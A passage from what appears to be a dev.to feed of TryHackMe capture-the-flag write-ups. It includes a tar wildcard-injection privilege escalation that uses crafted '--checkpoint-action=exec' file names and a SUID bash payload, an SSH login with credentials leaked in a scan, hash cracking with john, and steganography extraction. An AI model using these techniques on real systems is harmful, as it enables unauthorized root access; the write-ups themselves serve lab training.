&lt;p&gt;The &lt;code&gt;*&lt;/code&gt; wildcard is the key. &lt;code&gt;tar&lt;/code&gt; supports &lt;code&gt;--checkpoint&lt;/code&gt; flags that execute commands at intervals. By creating files named &lt;code&gt;--checkpoint=1&lt;/code&gt; and &lt;code&gt;--checkpoint-action=exec=[command]&lt;/code&gt; inside the backup directory, &lt;code&gt;tar&lt;/code&gt; interprets them as its own flags instead of files.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Different explanation of tar wildcard injection &lt;a href="https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;A malicious &lt;code&gt;shell.sh&lt;/code&gt; was created with the following payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;

&lt;span class="nb"&gt;chmod&lt;/span&gt; +s /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Execute permission was added and checkpoint files were created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod&lt;/span&gt; +x shell.sh 
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;"--checkpoint=1"&lt;/span&gt; 
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;"--checkpoint-action=exec=bash shell.sh"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Final state of the backup directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;andre@cmess:~/backup&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 andre andre    1 Jun 15 06:14 &lt;span class="nt"&gt;--checkpoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 andre andre    1 Jun 15 06:14 &lt;span class="nt"&gt;--checkpoint-action&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;bash shell.sh
&lt;span class="nt"&gt;-rwxr-x---&lt;/span&gt; 1 andre andre   51 Feb  9  2020 note
&lt;span class="nt"&gt;-rwxrwxr-x&lt;/span&gt; 1 andre andre   32 Jun 15 06:12 shell.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fired, &lt;code&gt;shell.sh&lt;/code&gt; was executed as root and SUID was set on &lt;code&gt;/bin/bash&lt;/code&gt;, allowing a root shell via &lt;code&gt;bash -p&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Flag located in &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Intermediate Nmap - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Sun, 14 Jun 2026 23:32:38 +0000</pubDate>
      <link>https://dev.to/laach_/intermediate-nmap-thm-45gh</link>
      <guid>https://dev.to/laach_/intermediate-nmap-thm-45gh</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/intermediatenmap" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 20 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Can you combine your great nmap skills with other tools to log in to this machine?&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Shell as Ubuntu
&lt;/h2&gt;

&lt;p&gt;Casually &lt;code&gt;nmap&lt;/code&gt; scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.112.177.171 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-O&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because this room is &lt;code&gt;Nmap&lt;/code&gt; targeted I'll break command down explaining what each flag does.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;-Pn (Skips Ping Scan. Nmap by default uses ping to verify if host is alive) 
-sV (Checks version of running service) 
-sC (Runs default NSE scripts) 
-p- (Scans whole port range from 0-65535, TCP only as -sU is not provided) 
-T4 (Sets speed of scan to 4 out of 5. Colloquially it's aggressive scan) 
-n  (Does not perform DNS resolution)
-O  (Nmap tries to identify OS of target)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Nmap scan report for 10.112.177.171
Host is up (0.028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7d:dc:eb:90:e4:af:33:d9:9f:0b:21:9a:fc:d5:77:f2 (RSA)
|   256 83:a7:4a:61:ef:93:a3:57:1a:57:38:5c:48:2a:eb:16 (ECDSA)
|_  256 30:bf:ef:94:08:86:07:00:f7:fc:df:e8:ed:fe:07:af (ED25519)
2222/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1c:49:54:c5:b5:29:c6:ef:83:de:21:3a:b1:6f:2a:23 (RSA)
|   256 94:de:30:2c:fb:71:c2:77:d9:c6:05:58:0c:27:f2:8c (ECDSA)
|_  256 b0:d1:6b:99:15:ad:fd:71:bb:15:7c:5b:0a:3d:24:db (ED25519)
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     In case I forget - user:pass
|_    ubuntu:Dafdas!!/str0ng
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.99%I=7%D=6/15%Time=6A2F345E%P=x86_64-pc-linux-gnu%r(N
SF:ULL,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/st
SF:r0ng\n\n")%r(GetRequest,35,"In\x20case\x20I\x20forget\x20-\x20user:pass
SF:\nubuntu:Dafdas!!/str0ng\n\n")%r(SIPOptions,35,"In\x20case\x20I\x20forg
SF:et\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(GenericLines,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(HTTPOptions,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu
SF::Dafdas!!/str0ng\n\n")%r(RTSPRequest,35,"In\x20case\x20I\x20forget\x20-
SF:\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(RPCCheck,35,"In\x20case\x
SF:20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(DNSVers
SF:ionBindReqTCP,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:D
SF:afdas!!/str0ng\n\n")%r(DNSStatusRequestTCP,35,"In\x20case\x20I\x20forge
SF:t\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(Help,35,"In\x20case
SF:\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(SSLSe
SF:ssionReq,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(TerminalServerCookie,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(TLSSessionReq,35,"In\x2
SF:0case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(
SF:Kerberos,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(SMBProgNeg,35,"In\x20case\x20I\x20forget\x20-\x20user
SF::pass\nubuntu:Dafdas!!/str0ng\n\n")%r(X11Probe,35,"In\x20case\x20I\x20f
SF:orget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(FourOhFourReque
SF:st,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str
SF:0ng\n\n")%r(LPDString,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\n
SF:ubuntu:Dafdas!!/str0ng\n\n")%r(LDAPSearchReq,35,"In\x20case\x20I\x20for
SF:get\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(LDAPBindReq,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(LANDesk-RC,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:
SF:Dafdas!!/str0ng\n\n")%r(TerminalServer,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n");
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.29 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;2222/tcp - SSH&lt;/li&gt;
&lt;li&gt;31337/tcp - ELITE?&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;&lt;code&gt;?&lt;/code&gt; in service name means Nmap is not 100% sure but this is its best guess&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Scan also reveals message from port 31337&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;In case I forget - user:pass
ubuntu:Dafdas!!/str0ng
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Credentials were used to authenticate via SSH on port 22. After logging in, the current directory was &lt;code&gt;/home/ubuntu&lt;/code&gt; which contained nothing of interest.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
total 28
drwxr-xr-x 1 ubuntu ubuntu 4096 Jun 14 22:39 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x 1 root   root   4096 Mar  2  2022 ..
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu  220 Feb 25  2020 .bash_logout
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu 3771 Feb 25  2020 .bashrc
drwx------ 2 ubuntu ubuntu 4096 Jun 14 22:39 .cache
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu  807 Feb 25  2020 .profile

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;/home&lt;/code&gt; directory was checked for other users.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ls /home
ubuntu  user
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Flag was found in the &lt;code&gt;user&lt;/code&gt; home directory.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ cat flag.txt
flag{REDACTED}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>cybersecurity</category>
      <category>linux</category>
      <category>ctf</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Easy Peasy - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Sat, 13 Jun 2026 01:46:11 +0000</pubDate>
      <link>https://dev.to/laach_/easy-peasy-thm-3fho</link>
      <guid>https://dev.to/laach_/easy-peasy-thm-3fho</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/easypeasyctf" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Task 1
&lt;/h2&gt;

&lt;p&gt;Enumeration starts with &lt;code&gt;nmap&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt 10.113.130.85
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8oeslxdyosr96xqpzmxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8oeslxdyosr96xqpzmxg.png" alt="nmap" width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three ports are open:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;li&gt;6498/tcp - SSH&lt;/li&gt;
&lt;li&gt;65524/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Question 1
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;How many ports are open?&lt;/code&gt; Answer: &lt;code&gt;3&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 2
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the version of nginx?&lt;/code&gt; Answer: &lt;code&gt;1.16.1&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 3
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is running on the highest port?&lt;/code&gt; Answer: &lt;code&gt;Apache&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Task 2
&lt;/h2&gt;

&lt;p&gt;Port 80 serves the nginx default page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpglzasc57wl99izievum.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpglzasc57wl99izievum.png" alt="nginx" width="692" height="247"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;&lt;code&gt;Feroxbuster&lt;/code&gt; was used instead of &lt;code&gt;gobuster&lt;/code&gt;, but both commands are provided.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://[IP]'&lt;/span&gt; &lt;span class="nt"&gt;--wordlist&lt;/span&gt; /usr/share/dirb/wordlists/common.txt 
&lt;span class="c"&gt;# or &lt;/span&gt;
gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://[IP]'&lt;/span&gt; &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/dirb/wordlists/common.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41bu671roi5zik9hi5w7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41bu671roi5zik9hi5w7.png" alt="feroxbuster" width="798" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Scan reveals &lt;code&gt;robots.txt&lt;/code&gt;, but it contains nothing useful. There is also &lt;code&gt;hidden/&lt;/code&gt;, which displays a creepy image. Source code reveals nothing. Ferox also finds &lt;code&gt;hidden/whatever/&lt;/code&gt;, which shows a mountain landscape. The page source contains a paragraph with a &lt;code&gt;hidden&lt;/code&gt; attribute.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;dead end&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;style&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;body&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nl"&gt;background-image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sx"&gt;url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg")&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;background-repeat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;no-repeat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;background-size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cover&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;width&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="m"&gt;35em&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;margin&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="nb"&gt;auto&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;font-family&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Tahoma&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Verdana&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Arial&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;sans-serif&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;/style&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;&amp;lt;p&lt;/span&gt; &lt;span class="na"&gt;hidden&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;ZmxhZ3tmMXJzN19mbDRnfQ==&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decoding it with &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; gives &lt;code&gt;flag{REDACTED}&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Port 65524 shows the Apache default page. Source code contains another hidden paragraph.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;p&lt;/span&gt; &lt;span class="na"&gt;hidden&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The hint suggests Base encoding. Trying all Base variants in &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; shows that only Base62 produces readable output. It decodes to &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt;. On the same page, another flag is embedded in the Apache page HTML.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
    They are activated by symlinking available
    configuration files from their respective
    Fl4g 3 : flag{REDACTED}
    *-available/ counterparts. These should be managed
    by using our helpers
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2enmod,
        a2dismod,
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2ensite,
        a2dissite,
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;
    and
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2enconf,
        a2disconf
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;. See their respective man pages for detailed information.
&lt;span class="nt"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Visiting &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt; shows a page with a 'matrix' image and a hash.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99ezflpd08h4ta46uuqs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99ezflpd08h4ta46uuqs.png" alt="hash" width="692" height="240"&gt;&lt;/a&gt;&lt;br&gt;
Running john with the provided wordlist fails, most likely because the wrong format is used. To fix this, john is run against every format that &lt;code&gt;hashid&lt;/code&gt; suggested.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;f &lt;span class="k"&gt;in &lt;/span&gt;Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;john hash.txt &lt;span class="nt"&gt;--wordlist&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;~/Desktop/easypeasy.txt &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$f&lt;/span&gt; &lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;John cracks the hash. The format is GOST, a Russian alternative to SHA256.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd8j1fvli5kgzsemfk4s8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd8j1fvli5kgzsemfk4s8.png" alt="cracked" width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract &lt;code&gt;secrettext.txt&lt;/code&gt; from the image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;steghide extract &lt;span class="nt"&gt;-sf&lt;/span&gt; binarycodepixabay.jpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe24vgbnkij4ciyfkf212.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe24vgbnkij4ciyfkf212.png" alt="extracted" width="382" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The file contains username &lt;code&gt;boring&lt;/code&gt; in plain text and a password in binary.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
